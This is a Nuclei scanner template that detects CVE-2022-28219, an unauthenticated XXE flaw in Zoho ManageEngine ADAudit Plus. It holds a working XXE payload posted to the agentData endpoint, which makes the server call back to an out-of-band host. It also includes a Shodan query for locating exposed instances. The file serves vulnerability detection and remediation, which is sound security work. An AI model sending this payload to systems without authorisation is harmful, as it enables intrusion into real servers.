nuclei-templates/cves/2022/CVE-2022-28219.yaml

id: CVE-2022-28219

info:
  name: Zoho ManageEngine ADAudit Plus - Unauthenticated XXE to RCE
  author: dwisiswant0
  severity: critical
  description: |
    Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
    unauthenticated XXE attack that leads to Remote Code Execution.
    This template supports the detection part only, to achieve an
    XXE to RCE, see reference[2].
  reference:
    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
    - https://manageengine.com
  remediation: |
    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
    is configured with a dedicated service account with restricted privileges.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-28219
    cwe-id: CWE-611
  metadata:
    verified: true
    shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
  tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/agent/tabs/agentData"

    headers:
      Content-Type: application/json
    body: |
      [
        {
          "DomainName": "{{Host}}",
          "EventCode": 4688,
          "EventType": 0,
          "TimeGenerated": 0,
          "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
        }
      ]

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "ManageEngine"